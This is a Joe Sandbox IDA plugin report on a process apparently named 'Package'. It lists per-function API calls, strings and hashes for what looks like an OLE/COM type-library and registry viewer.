Instruction ID: 6483381d302414d64088d0f7fa3b30928433a89f3acff67cfbb6aed4705634ac
Opcode Fuzzy Hash: 86ce976b8d3388a8a91f437fb59021873691659db0a02c78a5eb6a56a8efe5c9
Instruction Fuzzy Hash: 6C41C871504329ABDB11EF24DD86FEF7779EF55704F0000A9B909AB2C1DAB15E48CA70

Function 00D3D91D Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D3D924
FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00D3B9B7,?,00000000,00000000,00000000), ref: 00D3D942
#2810.MFC42U(?,%s %s,?,00000000,?), ref: 00D3D96C
#922.MFC42U(?,?,?,?,?,?,?), ref: 00D3D97F
#858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D98C
#800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D997
LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00D3D99F
#1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00D3D9AA
#540.MFC42U ref: 00D3D94F

Part of subcall function 00D3DCEB: wsprintfW.USER32 ref: 00D3DD1D

#540.MFC42U ref: 00D3D9B7
#2810.MFC42U(?,<No system message defined> %s,00000000,?), ref: 00D3D9D5
#922.MFC42U(?,?,?,?,?,?), ref: 00D3D9E8
#858.MFC42U(00000000,?,?,?,?,?,?), ref: 00D3D9F5
#800.MFC42U(00000000,?,?,?,?,?,?), ref: 00D3DA01
#1197.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00D3DA0B
#800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00D3DA13

Strings

<No system message defined> %s, xrefs: 00D3D9CF
%s %s, xrefs: 00D3D966

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#1197#2810#540#858#922$FormatFreeH_prolog3LocalMessagewsprintf
String ID: %s %s$<No system message defined> %s
API String ID: 3659733580-1395831093
Opcode ID: 07c71271fdea0c2ab2fabd48f2fafd65748cb414abbb9027d32cc4f44ac9247c
Instruction ID: 50327585abc5f4b3d564b4081b052a92a6e8ba512745769e75f17bb5f298de8e
Opcode Fuzzy Hash: 07c71271fdea0c2ab2fabd48f2fafd65748cb414abbb9027d32cc4f44ac9247c
Instruction Fuzzy Hash: A131D3B180020EAEDF01EBE0DD96DFFBB7EEF24345F144425B541B6192DA709A48DA71

Function 00D373B0 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 216registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(80000000,TypeLib,00000000), ref: 00D37402
RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000040), ref: 00D3743B
RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 00D3745D
RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00D37496
RegQueryValueW.ADVAPI32(?,?,?,00000208), ref: 00D374C9
CLSIDFromString.OLE32(00000000,-00000008), ref: 00D37570
wcstol.MSVCRT ref: 00D37610
wcsrchr.MSVCRT ref: 00D3762C
wcstol.MSVCRT ref: 00D37650
wsprintfW.USER32 ref: 00D37696
wsprintfW.USER32 ref: 00D376B9

Part of subcall function 00D37F0B: SendMessageW.USER32(?,00001132,00000000,00D34852), ref: 00D37F1D

RegCloseKey.ADVAPI32(?), ref: 00D37743
RegCloseKey.ADVAPI32(00000000), ref: 00D37754

Strings

', xrefs: 00D376E2
%s (Ver %s), xrefs: 00D376AD
%s <no name>, xrefs: 00D3768A
TypeLib, xrefs: 00D373F8

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: CloseEnumOpenwcstolwsprintf$FromMessageQuerySendStringValuewcsrchr
String ID: %s (Ver %s)$%s <no name>$'$TypeLib
API String ID: 3817488620-1332438793
Opcode ID: 8311c716e0cb6bebad6c0861aec37cf14117ae38d79c5efbd255a405878395a7
Instruction ID: 3da615d196674f6c6fc14de00ed2c1c7db63b0f657a40d2710fd2009c80e6d75
Opcode Fuzzy Hash: 8311c716e0cb6bebad6c0861aec37cf14117ae38d79c5efbd255a405878395a7
Instruction Fuzzy Hash: 61A1E3B5D086289FDB61DF64DC45BA9B7B8FB08305F0040EAE50DE6250DB78AE84DF61

Function 00D3D0B6 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 175registrystringCOMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000028,?,?,?,?,?,?,?), ref: 00D3D152
lstrcpyW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00D3D163
wsprintfW.USER32 ref: 00D3D179
RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00D3D1AA
wsprintfW.USER32 ref: 00D3D1CD

Part of subcall function 00D3D6F5: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D70D
Part of subcall function 00D3D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,00D3D6E4,?,?,?,00D3D6E4,80000000,?,?,?,?,?), ref: 00D3D72C
Part of subcall function 00D3D6F5: RegCloseKey.ADVAPI32(?,?,?,?,00D3D6E4,80000000,?,?,?,?,?,?,?,?), ref: 00D3D738

_wcsicmp.MSVCRT ref: 00D3D20E
wsprintfW.USER32 ref: 00D3D22D

Part of subcall function 00D3D81B: lstrlenW.KERNEL32(00D3D19D,?,80000000,00000000), ref: 00D3D846

RegEnumKeyW.ADVAPI32(?,00000000,?,000000FF), ref: 00D3D25C
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3D270
wsprintfW.USER32 ref: 00D3D286
lstrcpyW.KERNEL32(00000000,?), ref: 00D3D2C0

Strings

AppID\%s, xrefs: 00D3D280
CLSID\%s, xrefs: 00D3D173, 00D3D227
LocalServer32, xrefs: 00D3D11C
AppID, xrefs: 00D3D18B, 00D3D23A
CLSID, xrefs: 00D3D1A4
CLSID\%s\LocalServer32, xrefs: 00D3D1C7

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: wsprintf$CloseOpenlstrcpy$EnumFromQueryStringValue_wcsicmplstrlen
String ID: AppID$AppID\%s$CLSID$CLSID\%s$CLSID\%s\LocalServer32$LocalServer32
API String ID: 566217164-1287389397
Opcode ID: 0c6167ed35e828ad50b48621cbd8ba91b565761a16832bf78904a9bbba1eae97
Instruction ID: f69175a85de0678a325e98bf0bc8cde5fea6778af75073f309a605d5016dcefa
Opcode Fuzzy Hash: 0c6167ed35e828ad50b48621cbd8ba91b565761a16832bf78904a9bbba1eae97
Instruction Fuzzy Hash: BB512B76900219AFDF21EF94ED45EEA77BDEF46304F0040A2B945E6141DBB09B898FB1

Function 00D32570 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 128COMMON

Download Yara Rule

APIs

#355.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D325C2
#2507.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D325D1
#800.MFC42U(00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D325E5
#3494.MFC42U(?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D3260E
#800.MFC42U(?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D32679
#3494.MFC42U(?,?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D32696
#800.MFC42U(00000000,?,?,?,00000000,?,00000001,*.*,00000000,00001804,AllFiles(*.*)|*.*|,?,23685920), ref: 00D326D2
#800.MFC42U(?,00000000,AllFiles(*.*)|*.*|,?,23685920), ref: 00D32796

Strings

IMoniker::BindToObject failed on the file moniker created from ( "%s" )., xrefs: 00D32748
*.*, xrefs: 00D325B5
Yh#, xrefs: 00D3272C
AllFiles(*.*)|*.*|, xrefs: 00D325A9

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#3494$#2507#355
String ID: Yh#$*.*$AllFiles(*.*)|*.*|$IMoniker::BindToObject failed on the file moniker created from ( "%s" ).
API String ID: 539546934-1694893837
Opcode ID: 723d34e1f8aecb3e7ef3ac62cc2f73cf4134d0013609a226b2852410d5708614
Instruction ID: 87cd38cf5fbfa83f81db47daba43e2ff404f5e40ef509d67f0c6a842965a1ad2
Opcode Fuzzy Hash: 723d34e1f8aecb3e7ef3ac62cc2f73cf4134d0013609a226b2852410d5708614
Instruction Fuzzy Hash: 1A510571C146689FCB26DB64CC45BECBBB8BB14705F1481E9B059A72A1DB715F88CF20

Function 00D35270 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

#4078.MFC42U(00D24A54), ref: 00D3529C

Strings

", xrefs: 00D354FF

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #4078
String ID: "
API String ID: 2741252101-123907689
Opcode ID: ada722f368d63d5d854b6f29e64fef8049284ccedc7a406d969fbc2831a4df66
Instruction ID: bcbfaeec0b6e9e5eaf055d8cacc029bd7972b97f5a132175478738ff36667c81
Opcode Fuzzy Hash: ada722f368d63d5d854b6f29e64fef8049284ccedc7a406d969fbc2831a4df66
Instruction Fuzzy Hash: F5A11978901648EFDB14DFA8E949BADBBB1FF49315F244029E402E63A4D7B49980CF31

Function 00D2B734 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 146comCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D2B73B
#538.MFC42U(?), ref: 00D2B775

Part of subcall function 00D34899: #1662.MFC42U ref: 00D348D9
Part of subcall function 00D34899: #540.MFC42U ref: 00D348F3
Part of subcall function 00D34899: lstrcpyW.KERNEL32(?,00000000), ref: 00D34912
Part of subcall function 00D34899: CreateBindCtx.OLE32(00000000,?), ref: 00D34936
Part of subcall function 00D34899: MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00D34971
Part of subcall function 00D34899: #2644.MFC42U ref: 00D349D1
Part of subcall function 00D34899: #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 00D349E9
Part of subcall function 00D34899: #800.MFC42U(?,00000000), ref: 00D34A19

#800.MFC42U(?,?,?), ref: 00D2B799
#538.MFC42U(?,?,?,?), ref: 00D2B7A9
#800.MFC42U(?,?,?), ref: 00D2B7D1
CLSIDFromProgID.OLE32(?,?,?,?,?), ref: 00D2B7F1
CoCreateInstance.OLE32(?,00000000,?), ref: 00D2B824
#538.MFC42U(?), ref: 00D2B836
#540.MFC42U ref: 00D2B84A
#2810.MFC42U(?,CoCreateInstance failed using the CLSID for '%s',?), ref: 00D2B862

Part of subcall function 00D3D91D: __EH_prolog3.LIBCMT ref: 00D3D924
Part of subcall function 00D3D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00D3B9B7,?,00000000,00000000,00000000), ref: 00D3D942
Part of subcall function 00D3D91D: #540.MFC42U ref: 00D3D94F
Part of subcall function 00D3D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00D3D96C
Part of subcall function 00D3D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 00D3D97F
Part of subcall function 00D3D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D98C
Part of subcall function 00D3D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D997
Part of subcall function 00D3D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00D3D99F
Part of subcall function 00D3D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00D3D9AA
Part of subcall function 00D3D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00D3DA13

#800.MFC42U(?,8007000E), ref: 00D2B8F8

Strings

The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file., xrefs: 00D2B8DD
CoCreateInstance failed using the CLSID for '%s', xrefs: 00D2B85C

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#2810#538#540$Create$#1197#1662#2644#858#922BindDisplayFormatFreeFromH_prolog3H_prolog3_InstanceLocalMessageNameParseProglstrcpy
String ID: CoCreateInstance failed using the CLSID for '%s'$The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file.
API String ID: 2990471804-1967779486
Opcode ID: 88633d838a4a3fe5bf942d33d9355b51f230ea9185333f007fa9f7fdbb0856b9
Instruction ID: 12f2fbb8a12910623fce48e26043baeb059a642e472e5e4758d2718f5f4e7189
Opcode Fuzzy Hash: 88633d838a4a3fe5bf942d33d9355b51f230ea9185333f007fa9f7fdbb0856b9
Instruction Fuzzy Hash: 825149759012289FCB00DFA0E995ADEBBB9EF18324F1441A5F915B72A1DB70AE05CF70

Function 00D31100 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D3110A
SetActiveWindow.USER32(?,00000228), ref: 00D3111B
#2859.MFC42U(00000000), ref: 00D31122
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00D3112E
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00D31152
#1165.MFC42U ref: 00D31158
#538.MFC42U(?), ref: 00D31187

Part of subcall function 00D34899: #1662.MFC42U ref: 00D348D9
Part of subcall function 00D34899: #540.MFC42U ref: 00D348F3
Part of subcall function 00D34899: lstrcpyW.KERNEL32(?,00000000), ref: 00D34912
Part of subcall function 00D34899: CreateBindCtx.OLE32(00000000,?), ref: 00D34936
Part of subcall function 00D34899: MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00D34971
Part of subcall function 00D34899: #2644.MFC42U ref: 00D349D1
Part of subcall function 00D34899: #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 00D349E9
Part of subcall function 00D34899: #800.MFC42U(?,00000000), ref: 00D34A19

#800.MFC42U(?,00000000,?), ref: 00D311B5
#538.MFC42U(?,?,00000000,?), ref: 00D311CB

Part of subcall function 00D342EB: #1662.MFC42U(23685920), ref: 00D34326

#800.MFC42U(00000000,?,?,?,00000000,?), ref: 00D311F9
LoadTypeLib.OLEAUT32(?,00000000), ref: 00D3121B
#540.MFC42U ref: 00D31258
#2810.MFC42U(?,The file droped (%s) is not a valid persistent OLE object or Type Library file.,?), ref: 00D31277

Part of subcall function 00D3D91D: __EH_prolog3.LIBCMT ref: 00D3D924
Part of subcall function 00D3D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00D3B9B7,?,00000000,00000000,00000000), ref: 00D3D942
Part of subcall function 00D3D91D: #540.MFC42U ref: 00D3D94F
Part of subcall function 00D3D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00D3D96C
Part of subcall function 00D3D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 00D3D97F
Part of subcall function 00D3D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D98C
Part of subcall function 00D3D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D997
Part of subcall function 00D3D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00D3D99F
Part of subcall function 00D3D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00D3D9AA
Part of subcall function 00D3D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00D3DA13

#800.MFC42U(?,00000000), ref: 00D31296
DragFinish.SHELL32(?), ref: 00D312AF

Strings

The file droped (%s) is not a valid persistent OLE object or Type Library file., xrefs: 00D31271

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#2810#540Drag$#1662#538FileQuery$#1165#1197#2644#2859#858#922ActiveBindCreateDisplayFinishFormatFreeH_prolog3H_prolog3_LoadLocalMessageNameParseTypeWindowlstrcpy
String ID: The file droped (%s) is not a valid persistent OLE object or Type Library file.
API String ID: 1998644663-3375467908
Opcode ID: fac1b7b13886c3a4aea8a3b53fdf3511d348a35d8d1bc65bb6c0cb01f99065c8
Instruction ID: 74334156825892bc2053fbfa5ff9c025f5c9e0a2db0c306485554cc00a2650ad
Opcode Fuzzy Hash: fac1b7b13886c3a4aea8a3b53fdf3511d348a35d8d1bc65bb6c0cb01f99065c8
Instruction Fuzzy Hash: 46413B79901229ABCB10EBA0DC89BDDB779FF19320F104295E505A7291DB34AE85CFB4

Function 00D30F10 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00D30F1A
#355.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D30F3C
#2507.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D30F4A
#3494.MFC42U(?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D30F6B
LoadTypeLib.OLEAUT32(?,?), ref: 00D30F89
#540.MFC42U(?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D30FA2
#3494.MFC42U(?,?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D30FB8
#2810.MFC42U(?,LoadTypeLib( %s ) failed.,00000000,?,?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D30FCF
#800.MFC42U ref: 00D30FE1
#800.MFC42U(?,8007000E), ref: 00D30FF9
#800.MFC42U(?,00000354), ref: 00D31034
#800.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D3103F
#641.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D3104A

Strings

LoadTypeLib( %s ) failed., xrefs: 00D30FC9
TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|, xrefs: 00D30F22
*.tlb, xrefs: 00D30F35

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#3494$#2507#2810#355#540#641H_prolog3_LoadType
String ID: *.tlb$LoadTypeLib( %s ) failed.$TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|
API String ID: 2313197997-4003309560
Opcode ID: 594198ac2f922ed30516748a0914b9d5f8ab2cc2afa15f2c87b28c9212370d3d
Instruction ID: 3c0e668d65d21bae924c51259321d52b53346e1313c5edeb3ed2728fafd58715
Opcode Fuzzy Hash: 594198ac2f922ed30516748a0914b9d5f8ab2cc2afa15f2c87b28c9212370d3d
Instruction Fuzzy Hash: 75315C319006689FCB2AEB50DC81AEDBB78EF14705F0800D5B445771A1DA715F88CF71

Function 00D30810 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D30826
#4219.MFC42U(Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo,Launch Permissions,00000004), ref: 00D3083E
LoadCursorW.USER32(00000000,00007F02), ref: 00D30853
SetCursor.USER32(00000000), ref: 00D3085A
SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D3088A
#2634.MFC42U(00000000), ref: 00D30897
#2634.MFC42U(00000000,00000000), ref: 00D308A3
LoadCursorW.USER32(00000000,00007F00), ref: 00D308AE
SetCursor.USER32(00000000), ref: 00D308B5
#4118.MFC42U ref: 00D308C3
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D308DB
#5977.MFC42U ref: 00D308E4
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D308F2

Strings

Launch Permissions, xrefs: 00D30832
LaunchPermission, xrefs: 00D30860
Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo, xrefs: 00D30837

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: CursorMessageSend$#2634Load$#4118#4219#5977
String ID: Launch Permissions$LaunchPermission$Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo
API String ID: 791338786-3477396783
Opcode ID: 236455aa2493c096d544ed4a0cf680fdfbaed8f3c1118742709072c01afbba51
Instruction ID: 61d3777422edaaf04db4c580f3e76cac49c40825e35818035b3cb4cff2c45de1
Opcode Fuzzy Hash: 236455aa2493c096d544ed4a0cf680fdfbaed8f3c1118742709072c01afbba51
Instruction Fuzzy Hash: 72216D31240320BBEB216F61DC4EFDB3F29DF47751F050030BA0A99196CBA45886C6F0

Function 00D2D2E0 Relevance: 27.2, APIs: 18, Instructions: 221windowCOMMON

Download Yara Rule

APIs

#5031.MFC42U(?,?,?), ref: 00D2D301
#6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 00D2D34C
GetWindowRect.USER32(00000000,?), ref: 00D2D320

Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8B7
Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8C4
Part of subcall function 00D2C8A6: #3133.MFC42U(?,?,?,00D2C46E,?), ref: 00D2C8CC

GetWindowRect.USER32(00000000,?), ref: 00D2D36B
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2D38B
#6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00D2D3BC
GetWindowRect.USER32(00000000,?), ref: 00D2D3E6
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2D406
#6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00D2D430
GetWindowRect.USER32(00000000,?), ref: 00D2D44F
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2D46F
#6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00D2D499
GetWindowRect.USER32(00000000,?), ref: 00D2D4B8
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2D4D8
#6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00D2D502
GetWindowRect.USER32(00000000,?), ref: 00D2D521
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2D541
#6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00D2D568

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #6193RectWindow$MessageSend$ClientScreen$#3133#5031
String ID:
API String ID: 4086507556-0
Opcode ID: 0e8f03078245da8921e96ba15ee09773a144c9de9408506fbf0273256e389c72
Instruction ID: 437af59268f891e6bc00a322c403abe5fdc9c566665eff27fdfe99f20e256468
Opcode Fuzzy Hash: 0e8f03078245da8921e96ba15ee09773a144c9de9408506fbf0273256e389c72
Instruction Fuzzy Hash: D2815074640309AFEB20DFB4DC89FEFBBBAEB44704F144528B615A61E4D7B06905DAB0

Function 00D2EBCC Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

#540.MFC42U(23685920,?,?,?,?,?,00D404CF,000000FF), ref: 00D2EBFF
#540.MFC42U(23685920,?,?,?,?,?,00D404CF,000000FF), ref: 00D2EC07
#4155.MFC42U(00000004,23685920,?,?,?,?,?,00D404CF,000000FF), ref: 00D2EC11
#4155.MFC42U(00000008,00000004,23685920,?,?,?,?,?,00D404CF,000000FF), ref: 00D2EC1B
#6398.MFC42U(?,?,?,00000008,00000004,23685920,?,?,?,?,?,00D404CF,000000FF), ref: 00D2EC32
